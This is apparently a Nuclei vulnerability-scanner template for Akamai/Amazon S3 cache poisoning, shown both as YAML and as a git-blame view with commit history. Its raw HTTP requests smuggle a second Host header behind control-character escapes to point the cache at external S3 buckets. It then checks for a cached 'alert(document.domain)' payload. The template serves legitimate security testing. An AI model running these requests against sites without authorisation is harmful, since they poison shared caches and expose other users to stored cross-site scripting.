nuclei-templates/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml

id: akamai-s3-cache-poisoning

info:
  name: Akamai/Amazon S3 - Cache Poisoning
  author: DhiyaneshDk
  severity: high
  description: Akamai/Amazon S3 expose a stored cross-site scripting vulnerability generated by cache poisoning capability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can further allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://web.archive.org/web/20230101082612/https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
    - https://owasp.org/www-community/attacks/Cache_Poisoning
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cwe-id: CWE-44
  metadata:
    max-request: 204
    verified: true
  tags: cache,poisoning,generic,xss,akamai,s3,misconfig

variables:
  rand: "{{rand_base(5)}}"

http:
  - raw:
      - |+
        GET /nuclei.svg?{{rand}}=x HTTP/1.1
        Host: {{Hostname}}
        {{escape}}Host: {{bucket}}

      - |+
        GET /nuclei.svg?{{rand}}=x HTTP/1.1
        Host: {{Hostname}}

    attack: clusterbomb
    payloads:
      escape:
        - "\x0b"
        - "\x0c"
        - "\x1c"
        - "\x1d"
        - "\x1e"
        - "\x1f"

      bucket:
        - "nuclei-ap-northeast-1"
        - "nuclei-ap-northeast-2"
        - "nuclei-ap-northeast-3"
        - "nuclei-ap-south-1"
        - "nuclei-ap-southeast-1"
        - "nuclei-ap-southeast-2"
        - "nuclei-ca-central-1"
        - "nuclei-eu-central-1"
        - "nuclei-eu-north-1"
        - "nuclei-eu-west-1"
        - "nuclei-eu-west-2"
        - "nuclei-eu-west-3"
        - "nuclei-sa-east-1"
        - "nuclei-us-east-1"
        - "nuclei-us-east-2"
        - "nuclei-us-west-1"
        - "nuclei-us-west-2"

    stop-at-first-match: true
    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "alert(document.domain)")'
          - 'status_code_2 == 200'
        condition: and
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`id: akamai-s3-cache-poisoning`

			`info:`
Enhancement: misconfiguration/akamai/akamai-s3-cache-poisoning.yaml by cs 2023-03-10 18:41:55 +00:00			`name: Akamai/Amazon S3 - Cache Poisoning`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`author: DhiyaneshDk`
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net> 2023-03-27 17:46:47 +00:00			`severity: high`
Enhancement: misconfiguration/akamai/akamai-s3-cache-poisoning.yaml by cs 2023-03-10 18:41:55 +00:00			`description: Akamai/Amazon S3 expose a stored cross-site scripting vulnerability generated by cache poisoning capability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can further allow the attacker to steal cookie-based authentication credentials and launch other attacks.`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`reference:`
Update akamai-s3-cache-poisoning.yaml URL no longer available, update using webarchive. 2023-01-19 22:07:50 +00:00			`- https://web.archive.org/web/20230101082612/https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`- https://owasp.org/www-community/attacks/Cache_Poisoning`
Enhancement: misconfiguration/akamai/akamai-s3-cache-poisoning.yaml by cs 2023-03-10 18:41:55 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L`
			`cvss-score: 7.1`
			`cwe-id: CWE-44`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 204`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
add misconfig tag to templates in http/misconfiguration 2023-06-02 23:20:49 +00:00			`tags: cache,poisoning,generic,xss,akamai,s3,misconfig`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00
			`variables:`
			`rand: "{{rand_base(5)}}"`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`- raw:`
			`- \|+`
			`GET /nuclei.svg?{{rand}}=x HTTP/1.1`
			`Host: {{Hostname}}`
			`{{escape}}Host: {{bucket}}`

			`- \|+`
			`GET /nuclei.svg?{{rand}}=x HTTP/1.1`
			`Host: {{Hostname}}`

			`attack: clusterbomb`
			`payloads:`
			`escape:`
			`- "\x0b"`
			`- "\x0c"`
			`- "\x1c"`
			`- "\x1d"`
			`- "\x1e"`
			`- "\x1f"`

			`bucket:`
			`- "nuclei-ap-northeast-1"`
			`- "nuclei-ap-northeast-2"`
			`- "nuclei-ap-northeast-3"`
			`- "nuclei-ap-south-1"`
			`- "nuclei-ap-southeast-1"`
			`- "nuclei-ap-southeast-2"`
			`- "nuclei-ca-central-1"`
			`- "nuclei-eu-central-1"`
			`- "nuclei-eu-north-1"`
			`- "nuclei-eu-west-1"`
			`- "nuclei-eu-west-2"`
			`- "nuclei-eu-west-3"`
			`- "nuclei-sa-east-1"`
			`- "nuclei-us-east-1"`
			`- "nuclei-us-east-2"`
			`- "nuclei-us-west-1"`
			`- "nuclei-us-west-2"`

			`stop-at-first-match: true`
			`unsafe: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(body_2, "alert(document.domain)")'`
			`- 'status_code_2 == 200'`
			`condition: and`